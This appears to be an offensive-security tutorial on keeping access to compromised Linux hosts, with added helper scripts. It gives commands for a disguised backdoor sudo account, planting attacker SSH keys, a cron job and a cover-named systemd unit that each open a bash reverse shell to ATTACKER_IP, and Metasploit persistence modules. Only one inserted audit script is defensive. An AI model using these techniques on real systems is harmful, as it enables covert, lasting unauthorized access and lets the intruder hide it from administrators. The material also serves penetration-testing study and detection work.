Establishing Persistence On Linux
In most cases root privileges are required to establish persistence on Linux (creating accounts, writing under /etc, registering services). The SSH-key and cron techniques are the exception: they also work as an unprivileged user, but then only persist access to that user's account.
Creating a backdoor user
/bin/bash -i
# Create a new user; pick a name that looks like a legitimate service account
useradd -m ftp -s /bin/bash
passwd ftp
# Give the new user administrator rights by adding it to the sudo group
# (wheel on RHEL/Fedora). Adding it to the root *group* does not grant root.
usermod -aG sudo ftp
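The account created above leaves three artefacts a defender looks for: a second UID 0 login, a new member of the sudo/wheel/root groups, and a service-sounding name that nevertheless has a home directory, a UID in the human range and a login shell. The audit below, added here as an example and not part of the original page, runs those three checks over constructed copies of /etc/passwd and /etc/group (the sample accounts are made up for the demonstration) so you can see what the backdoor user looks like from the other side; point the functions at the real files to check a live host.

```shell
#!/usr/bin/env bash
# Added example: audit passwd/group files for the traces a backdoor account
# leaves. Not part of the original page. Works on any passwd/group-format file.
set -eu

# find_uid0_accounts PASSWD_FILE
#   Any account other than root whose UID is 0 is root-equivalent.
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# find_admin_group_members GROUP_FILE
#   Prints group:member for every member of sudo, wheel or root.
find_admin_group_members() {
    awk -F: '($1 == "sudo" || $1 == "wheel" || $1 == "root") && $4 != "" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) print $1 ":" m[i]
    }' "$1"
}

# find_login_shell_accounts PASSWD_FILE
#   Accounts in the human UID range (>= 1000) that have a real login shell.
#   A genuine "ftp" service account would have a low UID and nologin/false.
find_login_shell_accounts() {
    awk -F: '$3 >= 1000 && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# make_samples
#   Writes constructed sample files into a temp dir and prints the dir.
#   "toor" (UID 0) and "ftp" (sudo member, bash shell) are the planted accounts.
make_samples() {
    dir=$(mktemp -d)
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ftp:x:1001:1001::/home/ftp:/bin/bash
toor:x:0:0::/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF
    cat > "$dir/group" <<'EOF'
root:x:0:
sudo:x:27:alice,ftp
wheel:x:10:
users:x:100:alice,ftp
EOF
    echo "$dir"
}

# Example run against the constructed files (use /etc/passwd and /etc/group
# on a real host):
#   d=$(make_samples)
#   find_uid0_accounts "$d/passwd"          # toor
#   find_admin_group_members "$d/group"     # sudo:alice, sudo:ftp
#   find_login_shell_accounts "$d/passwd"   # ftp, alice
```

The UID 0 check is the cheapest and most reliable of the three; the login-shell listing needs a baseline of which human accounts are expected, which is why a name like `ftp` is chosen in the first place.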
Persistence Via SSH Keys
Possible options:
- Look for private keys already on the target (for example in the ~/.ssh directory of any user) that allow logging in to it or to other hosts. Copy the key to your machine and restrict its permissions, otherwise ssh refuses to use it: chmod 400 PRIV_KEY
- Generate a key pair, append the public key to ~/.ssh/authorized_keys of the target user, and log in with the private key.
# Log in with a private key
ssh -i PRIVATE_KEY_NAME USER@TARGET
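The step that usually goes wrong when doing this by hand is permissions: with the default StrictModes, sshd silently ignores an authorized_keys file (or a ~/.ssh directory) that is group- or world-writable, and appending the same key twice leaves a tell-tale duplicate. The function below, added here as an example and not part of the original page, installs a public key the way sshd expects it; `gen_keypair` is a thin wrapper over ssh-keygen for the attacker side, and the public key in the block is a constructed placeholder, not a real key.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): install a public key into a
# user's authorized_keys idempotently and with the permissions sshd requires.
set -eu

# Constructed placeholder, not a real key. Replace with the output of
# gen_keypair (the .pub file) when using this for real.
CONSTRUCTED_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleConstructedKeyDataNotARealKey0000 attacker@kali'

# gen_keypair KEY_PATH  (attacker host)
#   Creates KEY_PATH and KEY_PATH.pub with no passphrase.
gen_keypair() {
    ssh-keygen -t ed25519 -N '' -f "$1"
}

# install_pubkey HOME_DIR PUBKEY_LINE  (target host)
#   Creates HOME_DIR/.ssh (0700) and authorized_keys (0600), appends the key
#   only if it is not already there, and prints "added" or "present".
install_pubkey() {
    home="$1"; key="$2"
    sshdir="$home/.ssh"
    auth="$sshdir/authorized_keys"
    mkdir -p "$sshdir"
    chmod 700 "$sshdir"
    touch "$auth"
    chmod 600 "$auth"
    if grep -qxF -- "$key" "$auth"; then
        echo present
    else
        printf '%s\n' "$key" >> "$auth"
        echo added
    fi
}

# count_keys HOME_DIR : number of non-empty lines in authorized_keys
count_keys() {
    grep -c . "$1/.ssh/authorized_keys" || true
}

# perms_ok HOME_DIR : succeeds if .ssh is 700 and authorized_keys is 600
#   (GNU stat -c first, BSD/macOS stat -f as fallback)
perms_ok() {
    d=$(stat -c %a "$1/.ssh" 2>/dev/null || stat -f %Lp "$1/.ssh")
    f=$(stat -c %a "$1/.ssh/authorized_keys" 2>/dev/null || stat -f %Lp "$1/.ssh/authorized_keys")
    [ "$d" = 700 ] && [ "$f" = 600 ]
}

# Example flow:
#   gen_keypair ./backdoor_key                              # attacker
#   install_pubkey /home/ftp "$(cat ./backdoor_key.pub)"     # on the target
#   ssh -i ./backdoor_key ftp@TARGET                         # attacker
```

If the target user's home is not owned by that user (or is group-writable), sshd also rejects the key; `chown -R USER:USER HOME/.ssh` after installing fixes the common case where the file was written as root.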
Persistence Via SSH Keys Using Metasploit Modules
post/linux/manage/sshkey_persistence
It is useful because all it leaves behind is one extra line in a user's authorized_keys: no new process, service or cron entry, and an additional key is easily missed among legitimate ones.
use post/linux/manage/sshkey_persistence
set SESSION SESSION_ID
set CREATESSHFOLDER true
run
Persistence Via Cron Jobs
After compromising a target, create a cron job that runs a bash reverse shell every minute; whenever the shell dies, the next run connects back to our netcat listener.
# Enumerate existing cron jobs (most /etc/cron* entries are directories, so list them rather than cat them)
ls -la /etc/cron*
cat /etc/crontab
# Create cron file: run the reverse shell every minute
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1'" > cron
# Install the file as the current user's crontab. Note this replaces the user's
# existing crontab; -i is not a load option, it is the confirmation flag for crontab -r
crontab cron
# List cronjobs
crontab -l
# Set up netcat
nc -nvlp ATTACKER_PORT
Persistence Via Cron Jobs Using Metasploit
exploit/linux/local/cron_persistence
use exploit/linux/local/cron_persistence
set SESSION SESSION_ID
run
Persistence Via Service
Register the reverse shell as a system service (a systemd unit on current distributions, an init script on older ones) so that it starts at boot and the init system restarts it whenever the connection drops. Writing the unit file requires root.
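A manual systemd variant, added here as an example and not part of the original page (the unit name `update-checker` and its description are made-up cover names, and ATTACKER_IP/ATTACKER_PORT are arguments): `render_unit` prints the unit, `write_unit` drops it into the unit directory, and `install_unit` enables and starts it. `Restart=always` with `RestartSec=60` is what makes the shell come back after the listener goes away; installing needs root and systemd, rendering does not.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): a systemd unit that launches a
# bash reverse shell at boot and restarts it whenever the connection drops.
set -eu

# render_unit ATTACKER_IP ATTACKER_PORT
#   Prints the unit file. Description is a made-up cover name.
render_unit() {
    cat <<EOF
[Unit]
Description=System Update Checker
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$1/$2 0>&1'
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF
}

# write_unit UNIT_DIR NAME ATTACKER_IP ATTACKER_PORT
#   Writes NAME.service into UNIT_DIR (normally /etc/systemd/system) with
#   the 0644 mode systemd expects, and prints the path.
write_unit() {
    path="$1/$2.service"
    render_unit "$3" "$4" > "$path"
    chmod 644 "$path"
    echo "$path"
}

# install_unit NAME
#   Reload unit definitions, enable at boot and start now. Needs root.
install_unit() {
    systemctl daemon-reload
    systemctl enable --now "$1.service"
}

# Example use on the target, as root (listener: nc -nvlp 4444 on 10.10.14.5):
#   write_unit /etc/systemd/system update-checker 10.10.14.5 4444
#   install_unit update-checker
#   systemctl status update-checker
```

`systemctl enable` creates a symlink under multi-user.target.wants, so the unit file plus that symlink are the two artefacts to remove on cleanup (`systemctl disable --now update-checker` followed by deleting the file). New units in /etc/systemd/system and recently enabled services are a standard hunt item, so this is the most visible of the techniques on this page.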
Persistence Via Service Using Metasploit
exploit/linux/local/service_persistence
use exploit/linux/local/service_persistence
set SESSION SESSION_ID
set payload cmd/unix/reverse_python
set LHOST ATTACKER_IP
set LPORT ATTACKER_PORT
run